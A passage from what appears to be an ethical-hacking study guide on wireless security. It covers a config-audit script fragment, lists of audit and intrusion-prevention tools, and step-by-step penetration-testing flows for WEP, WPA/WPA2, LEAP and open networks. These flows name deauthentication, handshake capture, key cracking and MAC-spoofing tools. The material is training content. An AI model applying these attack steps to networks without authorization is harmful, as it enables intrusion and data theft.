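auth_server_port=1812
auth_server_shared_secret=REPLACE_WITH_RADIUS_SECRET
macaddr_acl=1
accept_mac_file=/etc/hostapd/hostapd.accept
ieee80211w=2
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(parse_config(text)))
```

SSID cloaking and MAC filtering are reported at low severity on purpose: both are listed as practices above, but neither stops a passive observer, so the findings that matter are the encryption and authentication ones.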
Wi-Fi security auditing tools
The following are Wi-Fi security auditing tools:
• AirMagnet WiFi Analyzer: It is an industry standard tool used to perform mobile
auditing and troubleshoot enterprise Wi-Fi networks. It helps IT staff in solving end-user
problems related to security threats and wireless network vulnerabilities. AirMagnet WiFi
Analyzer has a full compliance reporting engine that automatically maps collected
network information to requirements for compliance with policy and industry regulations.
• AirDefense: It provides a single UI-based platform for wireless monitoring, intrusion
protection, automated threat mitigation, etc. It provides tools for the following:
o Rogue detection
o Policy enforcement
o Intrusion prevention
o Regulatory compliance
AirDefense uses distributed sensors that operate in tandem with a hardened purpose-built
server appliance in order to monitor all 802.11 (a/b/g/n) wireless traffic in real-time. In
order to accurately detect all wireless attacks and anomalous behavior, AirDefense
analyzes existing and day-zero threats in real-time against historical data. AirDefense
enables the rewinding and reviewing of detailed wireless activity records. This is useful
in forensic investigations and ensures policy compliance.
• Adaptive Wireless IPS (WIPS): It is used to provide wireless-network threat detection
and mitigation against malicious attacks and security vulnerabilities. It can be used to
detect, analyze, and identify wireless threats.
WIPS
Wireless intrusion prevention system (WIPS) monitors the radio spectrum for the presence of
unauthorized, rogue access points and the use of wireless attack tools. The system monitors the
radio spectrum used by wireless LANs, and immediately alerts a systems administrator whenever
a rogue access point is detected. Conventionally, it is achieved by comparing the MAC address
of the participating wireless devices. Rogue devices can spoof MAC address of an authorized
network device as their own. WIPS uses the fingerprinting approach to weed out devices with
spoofed MAC addresses. The idea is to compare the unique signatures exhibited by the signals
emitted by each wireless device against the known signatures of pre-authorized, known wireless
devices.
Wi-Fi intrusion prevention systems
The following are Wi-Fi intrusion prevention systems:
• SonicWall Wireless Networking
• Network Box IDP
• TippingPoint IPS
• 3Com AirProtect
• Newbury RF Firewall
• AirMobile Server
• SpectraGuard Enterprise
• WLS Manager
Wi-Fi predictive planning tools
The following are Wi-Fi predictive planning tools:
• AirMagnet Planner
• Networks RingMaster
• Control System Planning Tool
• Spot Predictive Site Survey
• SpectraGuard Planner
• Site Survey Professional
• LAN Planner
• Wi-Fi Planner
Wi-Fi vulnerability scanning tools
The following are Wi-Fi vulnerability scanning tools:
• Karma
• FastTrack
• Zenmap
• WiFiDEnum
• Nessus
• WiFiZoo
• OSWA
• Security Assessment Toolkit
EAP-TLS Protocol
Extensible Authentication Protocol-Transport Level Security (EAP-TLS) is an authentication
protocol, which provides mutual authentication, integrity-protected negotiation of cryptographic
service providers, and a secret key exchange between two systems that use public key
cryptography. EAP-TLS works on a network that is configured for Public Key Infrastructure
(PKI) and uses certificates for authentication. These certificates can be stored on computers or on
smart cards.
15.6 Examine Wireless Penetration Testing Framework
Exam Focus: Examine Wireless Penetration Testing Framework. Objective includes:
• Understand Wireless penetration testing.
• Examine Wireless Penetration Testing Framework.
Wireless penetration testing
Wireless penetration testing is used to actively evaluate information security measures
implemented in a wireless network. It is used to analyze design weaknesses, technical flaws, and
vulnerabilities. It is required for the following reasons:
• Threat assessment: The wireless threats faced by the information assets of an
organization are identified.
• Upgrading infrastructure: Existing infrastructure of software, hardware, or network
design is changed or upgraded.
• Risk prevention and response: A comprehensive set of preparation steps for
preventing upcoming exploitation is provided.
• Security control auditing: The efficiency of wireless security protections and controls is
tested and evaluated.
• Data theft detection: Streams of sensitive data are found by sniffing the traffic.
• Information system management: Information on security protocols, network strength,
and connected devices is collected.
In wireless penetration testing, a penetration tester needs to take the following steps:
• Wireless Discovery
• Packet Capturing
• Attacking WEP/WPA Password
• Generating frames using frame generation software
• Using IDS tools
Wireless penetration testing framework
Wireless penetration testing framework includes the following steps:
1. Discover wireless devices. Document all the findings if a wireless device is found.
2. Perform a general Wi-Fi network attack and check whether the wireless device found
uses WEP encryption or not if the wireless device is using a Wi-Fi network.
3. Perform WEP encryption pen testing or check whether WLAN uses WPA/WPA2
encryption or not if WLAN uses WEP encryption.
4. Perform WPA/WPA2 encryption pen testing or check whether WLAN uses LEAP
encryption or not if WLAN uses WPA/WPA2 encryption.
5. Perform LEAP encryption pen testing or check whether WLAN is unencrypted or not if
WLAN uses LEAP encryption.
6. Perform unencrypted pen testing or else perform Wi-Fi network attack if WLAN is
unencrypted.
General penetration steps for all wireless networks
The following are general penetration steps for all wireless networks:
1. Create a rogue access point. Use tools such as Karma, Hotspotter, Airsnarf, etc. to
deauthenticate the client and then check for client deauthentication.
2. If the client is deauthenticated, take the following steps:
1. Associate with the client.
2. Sniff the traffic.
3. Check if passphrase/certificate is acquired, or else deauthenticate the client again.
3. If passphrase is acquired, use the wzcook tool to crack the passphrase for stealing
confidential information, or else deauthenticate the client again.
Pen testing LEAP encrypted WLAN
Pen testing LEAP encrypted WLAN includes the following steps:
1. Use tools such as Karma, Hotspotter, Airsnarf, etc. to deauthenticate the client.
2. If the client is deauthenticated, use tools such as asleap, THC-LEAP Cracker, etc. to
break the LEAP encryption for stealing confidential information or else deauthenticate
the client again.
Pen testing WPA/WPA2 encrypted WLAN
Pen testing WPA/WPA2 encrypted WLAN includes the following steps:
1. Use tools such as Karma, Hotspotter, Airsnarf, etc. to deauthenticate the client.
2. If the client is deauthenticated, take the following steps:
1. Sniff the traffic.
2. Check the status of capturing EAPOL handshake or else deauthenticate the client
again.
3. If EAPOL handshake is captured, use tools such as coWPAtty, Aircrack-ng, etc. to
perform WPA/WPA2 dictionary attack for stealing confidential information or else
deauthenticate the client again.
Pen testing WEP encrypted WLAN
Pen testing WEP encrypted WLAN includes the following steps:
1. Check if the SSID is visible or hidden.
2. Sniff the traffic and check the status of packet capturing if SSID is visible.
3. If the packets are captured/injected, use tools such as Aircrack-ng, Airsnort, WEPcrack,
etc. to break the WEP key or else sniff the traffic again.
4. If SSID is hidden, take the following steps:
1. Use tools such as Aireplay-ng, Commview, Void11, etc. to deauthenticate the
client.
2. Associate the client.
3. Follow the procedure of visible SSID.
Pen testing unencrypted WLAN
Pen testing unencrypted WLAN includes the following steps:
1. Check if the SSID is visible or hidden.
2. Sniff for IP range and check the status of MAC filtering if SSID is visible.
3. If MAC filtering is enabled, use tools such as SMAC to spoof valid MAC or use IP
within the discovered range to connect to the AP.
4. If SSID is hidden, use tools such as Aireplay-ng to discover the SSID and follow the
procedure of visible SSID.
Capture a wireless network's packets
An attacker captures the packets from a wireless network and analyzes those packets to perform
attacks. The following tools are used to capture a wireless network's packets:
• Airopeek
• Airtraf
• Apsniff
• Cain
• Wireshark
WEP/WPA password attacking tools used in wireless penetration
The WEP/WPA password attacking tools used in the wireless penetration testing steps are as
follows:
• Aircrack-ptw
• Aircrack-ng
• Aircrack
• Airsnort
• coWPAtty
• wep attack
• wep crack
• Airbase
Frame generation software used in wireless penetration
The various frame generation software used in wireless penetration are as follows:
• Airgobbler
• airpwn
• Airsnarf
• Commview
• fake ap
• void 11
• wifi tap
IDS tools used in wireless penetration
The IDS tools used in wireless penetration are as follows:
• WIDZ
• War Scanner
• Snort-Wireless
• AirDefense
• AirMagnet
Chapter Summary
In this chapter, we learned about wireless networks, various types of wireless networks, Wi-Fi
authentication modes, and types of wireless encryption. This chapter focused on wireless hacking
methodology, Bluetooth hacking, and Wireless penetration testing.
Glossary
Ad hoc
Ad hoc is a basic topology of a wireless network. An ad hoc network consists of two or more
wireless devices that communicate directly with each other.
Infrastructure network
An infrastructure network consists of an access point that connects wireless devices to the
standard cable network.
MAC filtering
MAC filtering is a security access control technique that permits or denies network access to
specific devices based on their MAC address.
Service Set Identifier
Service Set Identifier is used to identify a wireless network. SSIDs are case sensitive text strings
and have a maximum length of 32 characters.
Warchalking
Warchalking is the drawing of symbols in public places to advertise an open Wi-Fi wireless
network.
Wardriving
Wardriving is a technique used to locate insecure wireless networks while driving around.
Warwalking
Warwalking is the act of walking around with a Wi-Fi enabled laptop to locate access points of
wireless networks.
Wireless intrusion prevention system
Wireless intrusion prevention system (WIPS) monitors the radio spectrum for the presence of
unauthorized, rogue access points and the use of wireless attack tools.
Wireless network
A wireless network refers to any type of computer network that is wireless, and is commonly
associated with a telecommunications network whose interconnections between nodes are
implemented without the use of wires.
WMAN
WMAN represents a wireless network that connects two or more wireless LANs in the same
geographical area.
WPAN
WPAN is a wireless personal area network that interconnects devices centered on an individual
person's workspace.